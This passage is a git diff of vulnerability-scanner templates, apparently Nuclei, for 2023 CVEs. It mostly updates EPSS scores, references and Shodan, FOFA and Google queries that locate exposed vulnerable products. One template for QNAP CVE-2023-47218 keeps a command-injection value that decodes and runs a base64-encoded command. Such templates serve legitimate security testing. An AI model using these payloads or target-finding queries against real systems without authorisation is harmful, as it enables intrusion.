epss-percentile: 0.80777 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 @@ -27,8 +27,8 @@ info: product: hoteldruid shodan-query: title:"HotelDruid" fofa-query: title="HotelDruid" + google-query: intitle:"hoteldruid" tags: cve,cve2023,hoteldruid,cms,sqli - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 08e6822031..18838f4b30 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43795 cwe-id: CWE-918 - epss-score: 0.11649 - epss-percentile: 0.95151 + epss-score: 0.13101 + epss-percentile: 0.9552 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: product: geoserver shodan-query: title:"GeoServer" fofa-query: app="GeoServer" + google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo variables: oast: "{{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 46398ab734..9cff578c2a 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -11,18 +11,20 @@ info: - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic - https://vuldb.com/?ctiid.237518 - https://vuldb.com/?id.237518 + - https://github.com/thedarknessdied/Ruijie_RG-EW1200G_login_bypass-CVE-2023-4415 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4415 cwe-id: CWE-287 - epss-score: 0.00355 - epss-percentile: 0.69044 + epss-score: 0.00593 + epss-percentile: 0.78272 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijienetworks product: rg-ew1200g_firmware + shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve2023,cve,ruijie,router,ruijienetworks diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index efacc220cb..612d04fdf4 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -23,6 +23,8 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe Coldfusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,coldfusion,adobe,xss variables: string: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index 5a92691943..b74ce8c896 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -12,13 +12,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-44353 - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py + - https://github.com/JC175/CVE-2023-44353-Nuclei-Template + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-44353 cwe-id: CWE-502 - epss-score: 0.00456 - epss-percentile: 0.72579 + epss-score: 0.00412 + epss-percentile: 0.73869 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,8 +28,9 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,deserialization,xss - variables: windows_known_path: "C:\\Windows\\" windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\" diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 5250b902bf..48b2ffe41f 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4451 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.2616 + epss-score: 0.00157 + epss-percentile: 0.52015 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: agentejo product: cockpit shodan-query: html:"Cockpit" + fofa-query: icon_hash=688609340 tags: cve2023,cve,huntr,cockpit,xss,agentejo http: diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 6f93166dc3..3bce26624b 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -19,15 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-44812 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28937 + epss-score: 0.01077 + epss-percentile: 0.84242 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" tags: cve2023,cve,moosocial,xss - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index e8a8a086ed..501673e2a6 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/ahrixia/CVE-2023-44813 - https://nvd.nist.gov/vuln/detail/CVE-2023-44813 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-44813 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28937 + epss-score: 0.01077 + epss-percentile: 0.84242 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: moosocial product: moosocial shodan-query: http.favicon.hash:702863115 + fofa-query: icon_hash="702863115" tags: cve,cve2023,moosocial,xss http: diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index fbbaafe62a..bf24c77f4b 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -15,16 +15,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4521 - epss-score: 0.00156 - epss-percentile: 0.51418 + epss-score: 0.03055 + epss-percentile: 0.90979 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:* metadata: vendor: mooveagency product: import_xml_and_rss_feeds framework: wordpress + shodan-query: http.html:"import-xml-feed" fofa-query: body="import-xml-feed" tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 49fad0f912..cecb719429 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -13,18 +13,17 @@ info: cvss-score: 8.8 cve-id: CVE-2023-45375 cwe-id: CWE-89 - epss-score: 0.0005 - epss-percentile: 0.17639 + epss-score: 0.01204 + epss-percentile: 0.8517 cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: 01generator product: pireospay framework: prestashop shodan-query: http.component:"prestashop" tags: cve,cve2023,sqli,prestashop,pireospay - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 3d03d31d2d..7dc533eff5 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -10,20 +10,22 @@ info: - https://github.com/20142995/sectool - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md + - https://vuldb.com/?ctiid.238047 + - https://vuldb.com/?id.238047 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4542 cwe-id: CWE-78 - epss-score: 0.00067 - epss-percentile: 0.29155 + epss-score: 0.90977 + epss-percentile: 0.9884 cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 vendor: dlink product: dar-8000-10_firmware fofa-query: body="DAR-8000-10" && title="D-Link" - verified: true - max-request: 1 tags: cve,cve2023,dlink http: diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 1c04c62437..8b9371da82 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4547 cwe-id: CWE-79 - epss-score: 0.00205 - epss-percentile: 0.58464 + epss-score: 0.0025 + epss-percentile: 0.6492 cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index de835a8516..279a767856 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -16,13 +16,15 @@ info: cve-id: CVE-2023-45542 cwe-id: CWE-79 epss-score: 0.00082 - epss-percentile: 0.33567 + epss-percentile: 0.34845 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index c5b8633606..4c5ca209a2 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -10,17 +10,23 @@ info: reference: - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f - https://nvd.nist.gov/vuln/detail/CVE-2023-45671 + - https://securitylab.github.com/advisories/GHSL-2023-190_Frigate/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.7 cve-id: CVE-2023-45671 - cpe: cpe:2.3:a:frigate:frigate:0.13.0:beta1:*:*:*:*:*:* + cwe-id: CWE-79 + epss-score: 0.00924 + epss-percentile: 0.82924 + cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: frigate product: frigate shodan-query: title:"Frigate" + fofa-query: title="frigate" + google-query: intitle:"frigate" tags: cve,cve2023,frigate,xss http: diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index e8da8a88ed..934220426c 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-4568 cwe-id: CWE-287 - epss-score: 0.00254 - epss-percentile: 0.6331 + epss-score: 0.02217 + epss-percentile: 0.89475 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: papercut product: papercut_ng shodan-query: html:"content=\"PaperCut\"" + fofa-query: body='content="papercut' + google-query: html:'content="papercut' tags: cve2023,cve,unauth,papercut http: diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 051ed6b3d3..40fc014d4b 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-45852 cwe-id: CWE-77 - epss-score: 0.09217 - epss-percentile: 0.94519 + epss-score: 0.10555 + epss-percentile: 0.95011 cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: product: vitogate_300_firmware shodan-query: title:"Vitogate 300" fofa-query: title="Vitogate 300" + google-query: intitle:"vitogate 300" tags: cve2023,cve,rce,vitogate,viessmann http: diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index 60276771a7..1a9ba0747d 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -13,18 +13,20 @@ info: reference: - https://github.com/SunshineOtaku/Report-CVE/blob/main/qdPM/9.2/Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2023-45855 + - https://qdpm.net classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-45855 cwe-id: CWE-22 - epss-score: 0.00087 - epss-percentile: 0.35946 + epss-score: 0.00318 + epss-percentile: 0.70433 cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:* metadata: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 + fofa-query: icon_hash=762074255 tags: cve,cve2023,qdpm,lfi http: diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 26ca18e549..048586acff 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4596 cwe-id: CWE-434 - epss-score: 0.08202 - epss-percentile: 0.93732 + epss-score: 0.07197 + epss-percentile: 0.94017 cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,9 +26,10 @@ info: vendor: incsub product: forminator framework: wordpress + shodan-query: http.html:/wp-content/plugins/forminator + fofa-query: body=/wp-content/plugins/forminator publicwww-query: /wp-content/plugins/Forminator tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub - variables: string: "CVE-2023-4596" diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 91e3ac4e08..83b1983004 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4634 cwe-id: CWE-73 - epss-score: 0.02012 - epss-percentile: 0.88618 + epss-score: 0.01686 + epss-percentile: 0.87686 cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: davidlingren product: media_library_assistant framework: wordpress + shodan-query: http.html:wp-content/plugins/media-library-assistant + fofa-query: body=wp-content/plugins/media-library-assistant publicwww-query: "wp-content/plugins/media-library-assistant" tags: cve,cve2023,packetstorm,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 53c778381e..c99a76fed6 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -14,8 +14,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46347 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31923 + epss-score: 0.04018 + epss-percentile: 0.92057 cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index 7aeae95268..f314c1bc5d 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -10,13 +10,22 @@ info: reference: - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/ - https://nvd.nist.gov/vuln/detail/CVE-2023-46359 + - http://hardy.com + - https://github.com/d4n-sec/d4n-sec.github.io + - https://github.com/fkie-cad/nvd-json-data-feeds classification: - cvss-metrics: CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.6 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-46359 + cwe-id: CWE-78 + epss-score: 0.1382 + epss-percentile: 0.95642 + cpe: cpe:2.3:h:hardy-barth:cph2_echarge:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: hardy-barth + product: cph2_echarge shodan-query: html:"Salia PLCC" tags: cve2023,cve,salia-plcc,cph2,rce diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 7406de95e5..bc3ad91ddb 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46574 cwe-id: CWE-77 - epss-score: 0.05804 - epss-percentile: 0.9323 + epss-score: 0.20185 + epss-percentile: 0.96341 cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: totolink product: a3700r_firmware shodan-query: title:"Totolink" + fofa-query: title="totolink" + google-query: intitle:"totolink" tags: cve,cve2023,totolink,router,iot,rce http: diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index d7ded59e4a..3995d27988 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46747 cwe-id: CWE-306,CWE-288 - epss-score: 0.97202 - epss-percentile: 0.99806 + epss-score: 0.97116 + epss-percentile: 0.9979 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: f5 product: big-ip_access_policy_manager shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev variables: username: "{{hex_encode(rand_base(5))}}" diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 996e6d04f4..403d79c66c 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -16,15 +16,17 @@ info: cvss-score: 8.2 cve-id: CVE-2023-46805 cwe-id: CWE-287 - epss-score: 0.96274 - epss-percentile: 0.99497 + epss-score: 0.96558 + epss-percentile: 0.99613 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2023,kev,auth-bypass,ivanti + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" + tags: packetstorm,cve,cve2023,kev,auth-bypass,ivanti http: - raw: diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 0992e66fc7..89ad645b26 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4714 cwe-id: CWE-200 - epss-score: 0.50923 - epss-percentile: 0.9748 + epss-score: 0.68074 + epss-percentile: 0.97962 cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index deccc8b7f6..87d67af3ce 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -16,13 +16,15 @@ info: cve-id: CVE-2023-47211 cwe-id: CWE-22 epss-score: 0.00164 - epss-percentile: 0.52059 + epss-percentile: 0.52964 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: zohocorp product: manageengine_firewall_analyzer shodan-query: "http.title:\"OpManager Plus\"" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive http: diff --git a/http/cves/2023/CVE-2023-47218.yaml b/http/cves/2023/CVE-2023-47218.yaml index ca420a4377..0b526d6316 100644 --- a/http/cves/2023/CVE-2023-47218.yaml +++ b/http/cves/2023/CVE-2023-47218.yaml @@ -3,7 +3,7 @@ id: CVE-2023-47218 info: name: QNAP QTS and QuTS Hero - OS Command Injection author: ritikchaddha - severity: high + severity: medium description: | An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later. reference: @@ -11,17 +11,19 @@ info: - https://twitter.com/win3zz/status/1760224052289888668/photo/3 - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/ - https://nvd.nist.gov/vuln/detail/CVE-2023-47218 + - https://www.qnap.com/en/security-advisory/qsa-23-57 classification: - cvss-metrics: CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 8.3 - cwe-id: CWE-78 + cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 5.8 cve-id: CVE-2023-47218 + cwe-id: CWE-77 + epss-score: 0.00305 + epss-percentile: 0.69699 metadata: verified: true max-request: 2 shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS" tags: cve,cve2023,qnap,qts,quts,rce,intrusive - variables: file: '{{rand_base(6)}}' cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22' diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index 44cfc8776b..cb7aeefff9 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-47246 cwe-id: CWE-22 - epss-score: 0.94354 - epss-percentile: 0.99149 + epss-score: 0.94622 + epss-percentile: 0.99239 cpe: cpe:2.3:a:sysaid:sysaid_on-premises:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index da286fdd08..6ebb7cc060 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -13,19 +13,23 @@ info: reference: - https://github.com/salesagility/SuiteCRM-Core/security/advisories/GHSA-fxww-jqfv-9rrr - https://nvd.nist.gov/vuln/detail/CVE-2023-47643 + - https://www.apollographql.com/blog/graphql/security/why-you-should-disable-graphql-introspection-in-production/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-47643 cwe-id: CWE-200 - epss-score: 0.00063 + epss-score: 0.06214 + epss-percentile: 0.93569 cpe: cpe:2.3:a:salesagility:suitecrm:8.4.1:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - product: suitecrm vendor: salesagility + product: suitecrm shodan-query: title:"SuiteCRM" + fofa-query: title="suitecrm" + google-query: intitle:"suitecrm" tags: cve,cve2023,graphql,suitecrm,introspection http: diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 67ded92e4f..b043a74b62 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -14,20 +14,23 @@ info: - https://github.com/bucketcat/CVE-2023-48084 - https://github.com/Hamibubu/CVE-2023-48084 - https://nvd.nist.gov/vuln/detail/CVE-2023-48084 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-48084 cwe-id: CWE-89 epss-score: 0.00114 - epss-percentile: 0.44333 + epss-percentile: 0.44856 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: nagios product: nagios_xi + shodan-query: http.title:"nagios xi" fofa-query: title="Nagios XI" + google-query: intitle:"nagios xi" tags: cve,cve2023,nagiosxi,sqli,authenticated http: diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index d756062547..9810fff72f 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-49070 cwe-id: CWE-94 - epss-score: 0.84671 - epss-percentile: 0.98424 + epss-score: 0.79399 + epss-percentile: 0.98282 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index a1a1d94f6c..539685ae88 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -27,6 +27,8 @@ info: vendor: owncloud product: graph_api shodan-query: title:"owncloud" + fofa-query: title="owncloud" + google-query: intitle:"owncloud" tags: cve2023,cve,owncloud,phpinfo,config,kev http: diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 04f7011d2b..096227b72e 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo - epss-score: 0.96486 - epss-percentile: 0.9956 + epss-score: 0.9671 + epss-percentile: 0.99651 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" @@ -26,6 +26,8 @@ info: vendor: citrix product: netscaler_application_delivery_controller shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" + fofa-query: title="citrix gateway" || title:"netscaler gateway" + google-query: intitle:"citrix gateway" || title:"netscaler gateway" tags: cve,cve2023,citrix,adc,info-leak,kev,exposure variables: payload: '{{repeat("a", 24812)}}' diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 9094021c35..4a33bfc64c 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -22,7 +22,7 @@ info: product: academy_lms shodan-query: html:"Academy LMS" fofa-query: body="Academy LMS" - tags: cve2023,cve,academylms,xss,creativeitem + tags: packetstorm,cve2023,cve,academylms,xss,creativeitem http: - method: GET diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 41734343b9..3ffd6a8b45 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4974 cwe-id: CWE-89 - epss-score: 0.01914 - epss-percentile: 0.87302 + epss-score: 0.02153 + epss-percentile: 0.89309 cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: creativeitem product: academy_lms shodan-query: html:"Academy LMS" + fofa-query: body="academy lms" tags: cve,cve2023,packetstorm,sqli,academy,lms,creativeitem http: diff --git a/http/cves/2023/CVE-2023-49785.yaml b/http/cves/2023/CVE-2023-49785.yaml index d63794ba0e..c0272ab872 100644 --- a/http/cves/2023/CVE-2023-49785.yaml +++ b/http/cves/2023/CVE-2023-49785.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-49785 cwe-id: CWE-79 epss-score: 0.00049 - epss-percentile: 0.1584 + epss-percentile: 0.17861 metadata: verified: true max-request: 2 diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 